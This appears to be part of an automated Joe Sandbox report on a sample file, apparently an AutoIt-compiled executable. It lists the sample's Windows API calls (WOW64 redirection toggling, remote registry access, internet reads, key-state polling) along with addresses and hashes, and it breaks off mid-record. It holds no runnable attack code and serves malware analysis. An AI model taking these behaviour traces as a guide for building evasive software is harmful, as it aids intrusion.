                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                    • String ID: SysAnimate32
                                    • API String ID: 3529120543-1011021900
                                    • Opcode ID: 7227c5afffd75f203beedf7d93ccf037f220eabfe839b628becfe4163bbca86c
                                    • Instruction ID: e66713e23c48dcfc06bef76b460a894e2f24c287fe5f47ed47925b987a54eaf8
                                    • Opcode Fuzzy Hash: 7227c5afffd75f203beedf7d93ccf037f220eabfe839b628becfe4163bbca86c
                                    • Instruction Fuzzy Hash: A7218C71204209ABEB205F64EC84EFB77BDFF59364F104628F950D6190DB71DCA29760
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007A4D1E,007B28E9,?,007A4CBE,007B28E9,008488B8,0000000C,007A4E15,007B28E9,00000002), ref: 007A4D8D
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007A4DA0
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,007A4D1E,007B28E9,?,007A4CBE,007B28E9,008488B8,0000000C,007A4E15,007B28E9,00000002,00000000), ref: 007A4DC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 49af808fd980322f55b8d1c0d61c994908ada7f0f43d3582b03ccf96f259fd97
                                    • Instruction ID: 7307611f725bcf31f8de5b9a717cf709e42e3bf4b73647f585530c2873cb79d8
                                    • Opcode Fuzzy Hash: 49af808fd980322f55b8d1c0d61c994908ada7f0f43d3582b03ccf96f259fd97
                                    • Instruction Fuzzy Hash: 90F04F35A80218FBDB519F94DC49BEDBBB9FF85752F0041A4F905A2260CB769980CA90
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00784EDD,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E9C
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00784EAE
                                    • FreeLibrary.KERNEL32(00000000,?,?,00784EDD,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784EC0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 145871493-3689287502
                                    • Opcode ID: f1d4853c8fd0b67d49f198601f7e21c4d6ca5f4d5ad6191ba7cb682e73bbe8a5
                                    • Instruction ID: 64148aedb5824c8a6e569a1eb31f1e29263caecba9dbe066cb3c9cd98ff3cd20
                                    • Opcode Fuzzy Hash: f1d4853c8fd0b67d49f198601f7e21c4d6ca5f4d5ad6191ba7cb682e73bbe8a5
                                    • Instruction Fuzzy Hash: D2E0C236AC2623BBD3322F25AC18BAF765CFF81F72B054115FC00E2200DBA8CD0182A0
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,007C3CDE,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E62
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00784E74
                                    • FreeLibrary.KERNEL32(00000000,?,?,007C3CDE,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 145871493-1355242751
                                    • Opcode ID: 9f7a2a33b4e93e7caed15de2bea669a18eae59591d37f387e9d9c6bc892cdfb9
                                    • Instruction ID: 741a642a4b7609804bb098e5f3ab4f9f2b16d3b3628f1d5bdd2c030c5409d7fd
                                    • Opcode Fuzzy Hash: 9f7a2a33b4e93e7caed15de2bea669a18eae59591d37f387e9d9c6bc892cdfb9
                                    • Instruction Fuzzy Hash: 46D012355C26626756222B256C18DCB7A1CFF85B653054515B905E2214CFA8CD0186D0
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 0080A427
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0080A435
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0080A468
                                    • CloseHandle.KERNEL32(?), ref: 0080A63D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                    • String ID:
                                    • API String ID: 3488606520-0
                                    • Opcode ID: 04b3fe824898dafa1ab9cca7233f0ac4b33ac22d45b9641ab1119f7d911c65e6
                                    • Instruction ID: 1ac895a8a99b9891e1e23486e7a9e864079dfccdd7d43e04c616228a81110916
                                    • Opcode Fuzzy Hash: 04b3fe824898dafa1ab9cca7233f0ac4b33ac22d45b9641ab1119f7d911c65e6
                                    • Instruction Fuzzy Hash: 58A19E71644300AFE724EF24D886B2AB7E5BF84714F14881CF55ADB2D2D7B5EC418B92
                                    APIs
                                      • Part of subcall function 007EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007ECF22,?), ref: 007EDDFD
                                      • Part of subcall function 007EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007ECF22,?), ref: 007EDE16
                                      • Part of subcall function 007EE199: GetFileAttributesW.KERNEL32(?,007ECF95), ref: 007EE19A
                                    • lstrcmpiW.KERNEL32(?,?), ref: 007EE473
                                    • MoveFileW.KERNEL32(?,?), ref: 007EE4AC
                                    • _wcslen.LIBCMT ref: 007EE5EB
                                    • _wcslen.LIBCMT ref: 007EE603
                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 007EE650
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                    • String ID:
                                    • API String ID: 3183298772-0
                                    • Opcode ID: 8658f4614ea62c9e4b5a214f12aa45d0e1429282f36bff2b2b4aa1dc8973b403
                                    • Instruction ID: 19fb98bff7bc43e745b335bb1dfb2657747cea17d7d6296a79f0e1ae8e6c95c6
                                    • Opcode Fuzzy Hash: 8658f4614ea62c9e4b5a214f12aa45d0e1429282f36bff2b2b4aa1dc8973b403
                                    • Instruction Fuzzy Hash: 965165B24093859BC724EB94DC859DFB3ECAF89340F004D1EF689D3191EF79A5888766
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 0080C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0080B6AE,?,?), ref: 0080C9B5
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080C9F1
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA68
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0080BAA5
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0080BB00
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0080BB63
                                    • RegCloseKey.ADVAPI32(?,?), ref: 0080BBA6
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0080BBB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                    • String ID:
                                    • API String ID: 826366716-0
                                    • Opcode ID: cb710a1bcd24072ce309e27d3119ff3cabf08a991c4521f555c4e5c3823ca596
                                    • Instruction ID: 8bb3b38882ddf7819aaacb9171ecac79070269d1b14a782a94d616a8797d7369
                                    • Opcode Fuzzy Hash: cb710a1bcd24072ce309e27d3119ff3cabf08a991c4521f555c4e5c3823ca596
                                    • Instruction Fuzzy Hash: 3361C231208241EFD754DF24C894E2ABBE5FF84318F54855CF4998B2A2DB35ED45CB92
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 007E8BCD
                                    • VariantClear.OLEAUT32 ref: 007E8C3E
                                    • VariantClear.OLEAUT32 ref: 007E8C9D
                                    • VariantClear.OLEAUT32(?), ref: 007E8D10
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007E8D3B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType
                                    • String ID:
                                    • API String ID: 4136290138-0
                                    • Opcode ID: 73cfcc7d41e46bc8222cc57fbe3eb571a744bbbc319d578a9f6dfe0f3e7fc389
                                    • Instruction ID: c34462f4ffa9b249deb033087ac772e5210ba9bce9d614d181d66368cee25022
                                    • Opcode Fuzzy Hash: 73cfcc7d41e46bc8222cc57fbe3eb571a744bbbc319d578a9f6dfe0f3e7fc389
                                    • Instruction Fuzzy Hash: 135197B5A01219EFCB10CF29C884AAAB7F9FF8D314B158559E909DB350E734E911CFA0
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007F8BAE
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 007F8BDA
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007F8C32
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007F8C57
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007F8C5F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String
                                    • String ID:
                                    • API String ID: 2832842796-0
                                    • Opcode ID: eb2a14021a7d7e7ca52105c88e6ebdc2447f2909d2c692303c45385788f3d400
                                    • Instruction ID: 8be01cafb132d217c41c9149c383c8d3e7c5b6b2c8f45ef4e23a2bcbd501c593
                                    • Opcode Fuzzy Hash: eb2a14021a7d7e7ca52105c88e6ebdc2447f2909d2c692303c45385788f3d400
                                    • Instruction Fuzzy Hash: CD515E75A00219DFCB05DF65C884A6DBBF5FF48314F088098E949AB362CB35ED51CBA1
                                    APIs
                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00808F40
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00808FD0
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00808FEC
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00809032
                                    • FreeLibrary.KERNEL32(00000000), ref: 00809052
                                      • Part of subcall function 0079F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,007F1043,?,753CE610), ref: 0079F6E6
                                      • Part of subcall function 0079F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,007DFA64,00000000,00000000,?,?,007F1043,?,753CE610,?,007DFA64), ref: 0079F70D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                    • String ID:
                                    • API String ID: 666041331-0
                                    • Opcode ID: d659b19230482f27d12998b3417b91e6ef5f7e63ec8154f21a8accfd9f6fe3ea
                                    • Instruction ID: 747c59432d5ee69633c22a8b96be04385a621b55fbe9dc4e6346e5db65c9dd43
                                    • Opcode Fuzzy Hash: d659b19230482f27d12998b3417b91e6ef5f7e63ec8154f21a8accfd9f6fe3ea
                                    • Instruction Fuzzy Hash: E1514E35644205DFC755EF64C884CADBBF1FF49314B0980A8E946AB3A2DB35ED85CB90
                                    APIs
                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00816C33
                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00816C4A
                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00816C73
                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,007FAB79,00000000,00000000), ref: 00816C98
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00816CC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Long$MessageSendShow
                                    • String ID:
                                    • API String ID: 3688381893-0
                                    • Opcode ID: 2f4bb4b7aa031a29cda181e240f6a41f47c2858a18ba8b4797d0705884eaafb2
                                    • Instruction ID: 01d5a7eb8f37b13116e381aa583f77977ccb0181b70d8cade851aee95a016986
                                    • Opcode Fuzzy Hash: 2f4bb4b7aa031a29cda181e240f6a41f47c2858a18ba8b4797d0705884eaafb2
                                    • Instruction Fuzzy Hash: 89418335604104AFDB248F28CC58FE57BADFF09360F154268E9D9E72A0E371ADA1DA90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 9ebb6c57e8d7232c1e9263fa6e689faa8e6022f43f5144b9b226ce4af841dade
                                    • Instruction ID: 4e85f5e60d0b57c5e9f9bfca0fbc6e47b958ebd11988a8328d9b69f56d86d066
                                    • Opcode Fuzzy Hash: 9ebb6c57e8d7232c1e9263fa6e689faa8e6022f43f5144b9b226ce4af841dade
                                    • Instruction Fuzzy Hash: A341E272A01204EFCB20DF78C884B9DB7A5EF89310F1545A8E515EB352DB35AD02CB80
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00799141
                                    • ScreenToClient.USER32(00000000,?), ref: 0079915E
                                    • GetAsyncKeyState.USER32(00000001), ref: 00799183
                                    • GetAsyncKeyState.USER32(00000002), ref: 0079919D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: 5c05c642cb16e129f9e78f3df681f3f7ffb248f9a1652a186a15f4ac5f9b7b39
                                    • Instruction ID: 9e7a96e80c3df41cc74180ce2c77d918d651ab5bc8d22dbbca4114f1a03a0d53
                                    • Opcode Fuzzy Hash: 5c05c642cb16e129f9e78f3df681f3f7ffb248f9a1652a186a15f4ac5f9b7b39
                                    • Instruction Fuzzy Hash: C5417F7190851AEBDF099F68D848BEEB775FF45320F20831AE525A22D0D7395950CB91
                                    APIs
                                    • GetInputState.USER32 ref: 007F38CB
                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 007F3922
                                    • TranslateMessage.USER32(?), ref: 007F394B
                                    • DispatchMessageW.USER32(?), ref: 007F3955
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007F3966
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                    • String ID:
                                    • API String ID: 2256411358-0
                                    • Opcode ID: 4e236b7e3f0ef4f5a57c06c3d3abbdd0335ce3f30b73da922c9ebfc728435037
                                    • Instruction ID: 14cc4e99ef397023518e44a6d528ab11451de7d3ea62bfac595b603a79cc225b
                                    • Opcode Fuzzy Hash: 4e236b7e3f0ef4f5a57c06c3d3abbdd0335ce3f30b73da922c9ebfc728435037
                                    • Instruction Fuzzy Hash: 1431C87054434A9EEF35CB35984CBB67BA8BB05349F04056DD66682390E7FCB684CB21
                                    APIs
                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 007FCF38
                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 007FCF6F
                                    • GetLastError.KERNEL32(?,00000000,?,?,?,007FC21E,00000000), ref: 007FCFB4
                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,007FC21E,00000000), ref: 007FCFC8
                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,007FC21E,00000000), ref: 007FCFF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                    • String ID:
                                    • API String ID: 3191363074-0
                                    • Opcode ID: 547d98e466842d1050449419892fcfa290136660a225bb269fe49ae78af736d3
                                    • Instruction ID: 97fe75d72ad7c25d6f52d16196bb593402ba999a30c2f9e6eb9416bbd9ad0aae
                                    • Opcode Fuzzy Hash: 547d98e466842d1050449419892fcfa290136660a225bb269fe49ae78af736d3
                                    • Instruction Fuzzy Hash: A5313C7260420DEFDB21DFA5D9849BABBF9EF14350B10842EE616D2240D738AE419B60
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 007E1915
                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 007E19C1
                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 007E19C9
                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 007E19DA
                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 007E19E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: 4cb382cd4ed5eab25d74fa4aa851356f2aeda0bb6b8d9ffdbbe8c0b8b6efcb82
                                    • Instruction ID: 391e857d916d54c544c690df463b14a357b35594f8f7846a68aed57c1e73fae1
                                    • Opcode Fuzzy Hash: 4cb382cd4ed5eab25d74fa4aa851356f2aeda0bb6b8d9ffdbbe8c0b8b6efcb82
                                    • Instruction Fuzzy Hash: 6731B171900299EFCB00CFA9CD99ADE3BB5FF08315F108229F921AB2D1C774A954CB90
                                    APIs
                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00815745
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0081579D
                                    • _wcslen.LIBCMT ref: 008157AF
                                    • _wcslen.LIBCMT ref: 008157BA
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00815816
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$_wcslen
                                    • String ID:
                                    • API String ID: 763830540-0
                                    • Opcode ID: 4597069910cd137ca6d039c1c2983e2273eba66389818cec963be9642e1b8948
                                    • Instruction ID: a0c5afb4a3dd6e0da1033a128b1f4e9272c25aa4503f04557489fde2d0104486
                                    • Opcode Fuzzy Hash: 4597069910cd137ca6d039c1c2983e2273eba66389818cec963be9642e1b8948
